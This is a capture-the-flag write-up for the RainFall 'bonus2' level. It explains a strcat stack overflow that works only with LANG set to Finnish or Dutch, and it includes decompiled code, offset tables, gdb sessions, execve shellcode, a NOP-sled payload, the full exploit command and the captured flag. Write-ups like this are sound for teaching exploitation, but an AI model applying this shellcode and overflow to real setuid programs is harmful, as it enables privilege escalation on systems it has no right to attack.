# Bonus 2

Binary: 32-bit ELF, SUID bonus3, dynamically linked. NX disabled, no stack canary.

## Analysis

### Ghidra output, simplified

```c
int language;  // global

void greetuser(void) {
    char buf[64] = {0};
    if (language == 1)       memcpy(buf, "Hyvää päivää ", 19);  // UTF-8
    else if (language == 2)  memcpy(buf, "Goedemiddag! ", 14);
    else                     memcpy(buf, "Hello ", 7);
    strcat(buf, caller_frame + 8);   // source = main's buf, passed via rep movsl
    puts(buf);
}

int main(int argc, char **argv) {
    char buf[76] = {0};
    if (argc != 3) return 1;
    strncpy(buf,      argv[1], 40);
    strncpy(buf + 40, argv[2], 32);
    char *lang = getenv("LANG");
    if (lang) {
        if (memcmp(lang, "fi", 2) == 0) language = 1;
        else if (memcmp(lang, "nl", 2) == 0) language = 2;
    }
    greetuser();  // buf copied onto greetuser's arg slot via rep movsl (19 dwords)
    return 0;
}
```

Three bugs compose:

1. `strncpy(..., 40)` and `strncpy(..., 32)` with exactly-40/32-byte inputs leave no null terminator. The two segments fuse into a 72-byte blob.
2. main copies the 76-byte buffer onto greetuser's argument slot via `rep movsl` before the call. greetuser reads the blob off its own stack (`ebp+8`).
3. `strcat(buf, blob)` in greetuser has no bound. It appends 72 controlled bytes after the greeting, overflowing past the saved EIP.

## Why LANG matters

Stack layout in greetuser:
- Greeting starts at `ebp-0x48` (not `ebp-0x4c` despite Ghidra's `local_4c` label; the ASM `lea -0x48(%ebp), %eax` is the real base).
- Saved return address at `ebp+4`.

strcat writes at `greeting_start + strlen(greeting)`. For each language:

| LANG    | Greeting                 | Bytes | Null at   | Write base  | Bytes to EIP | argv[2] offset |
|---------|--------------------------|-------|-----------|-------------|--------------|----------------|
| unset   | "Hello "                 | 7     | ebp-0x42  | ebp-0x42    | 70           | 30 (no hit)    |
| fi      | "Hyvää päivää "          | 19    | ebp-0x36  | ebp-0x36    | 58           | 18             |
| nl      | "Goedemiddag! "          | 14    | ebp-0x3b  | ebp-0x3b    | 63           | 23             |

Default "Hello " almost reaches: user bytes 70 and 71 hit EIP bytes 0 and 1, but the user payload is only 72 bytes total, so EIP bytes 2 and 3 (at `ebp+6`, `ebp+7`) are untouched by user data and strcat's trailing null clobbers only one of them. No full 4-byte overwrite → EIP stays valid and the function returns normally.

Setting `LANG=fi` or `LANG=nl` shifts the write base enough that four consecutive user bytes fall on the saved EIP.

### Offset confirmation via cyclic pattern

```
$ export LANG=fi
$ gdb ./bonus2
(gdb) run $(python -c 'print "A"*40') Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab
...
Program received signal SIGSEGV.
0x41366141 in ?? ()           # "Aa6A" → offset 18 in argv[2]
```

With `LANG=nl` the crash is at `0x38614137` = `"7Aa8"` → offset 23.

## Exploit

NX is disabled, so stack shellcode works. Put it in an env var, jump into a NOP sled.

### Shellcode (28 bytes)

Same lineage as bonus0: execve("/bin/sh") with edx, ecx both zeroed via register copies.

```
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80
```

### Payload

- `argv[1]` = 40 A's (saturates first strncpy, no terminator).
- `argv[2]` = 18 A's + 4-byte return address + 10 B's (32 bytes, no terminator).

The 4 bytes at `argv[2][18..21]` overwrite saved EIP when `LANG=fi`.

### Address discovery

Stack addresses shift between gdb and free-running processes (gdb injects extra env vars), by hundreds of bytes. A 4096-byte NOP sled absorbs the drift.

```bash
export LANG=fi
export SHELLCODE=$(python -c 'print "\x90"*4096 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"')

gdb ./bonus2
(gdb) b *main
(gdb) r AAAA BBBB
(gdb) p (char *)getenv("SHELLCODE")
$1 = 0xbfffee19 "\220..."
(gdb) q
```

Sled runs `0xbfffee19` to `0xbffffe19`. Aim mid-sled at `0xbffff619` (little-endian `\x19\xf6\xff\xbf`, no nulls).

### Fire

```bash
./bonus2 $(python -c 'print "A"*40') $(python -c 'print "A"*18 + "\x19\xf6\xff\xbf" + "B"*10')
```

Output:
```
Hyvää päivää AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<addr>BBBBBBBBBB
$ cat /home/user/bonus3/.pass
71d449df0f960b36e0055eb58c14d0f5d0ddc0b35328d657f91cf0df15910587
```

Flag: `71d449df0f960b36e0055eb58c14d0f5d0ddc0b35328d657f91cf0df15910587`

## Notes

### The Ghidra offset trap

Ghidra labeled the greeting buffer `local_4c` which suggested it starts at `ebp-0x4c`, and the first assignment `local_4c[0] = 'H'` reinforces that. But the ASM copies the greeting via `lea -0x48(%ebp), %eax; mov (%edx), %ecx; mov %ecx, (%eax); ...`, which writes starting at `ebp-0x48`. So the true base is `ebp-0x48` and all offset math should use that. Four bytes' difference is enough to land on the caller's saved EBP instead of the saved EIP, which was the early failure mode.

### Why the default language falls short

"Hello " ends at `ebp-0x42`, giving 70 bytes of runway before the saved EIP. With a 72-byte user payload, only the first 2 bytes of EIP get overwritten; the other 2 stay as whatever the compiler left there, which is usually the real return address back to main. No redirection.

### Credit

Exploit structure and offsets verified against the public writeup at https://github.com/maxisimo/42-RainFall/tree/main/bonus2 after my initial offset-22 draft missed by 4 bytes.
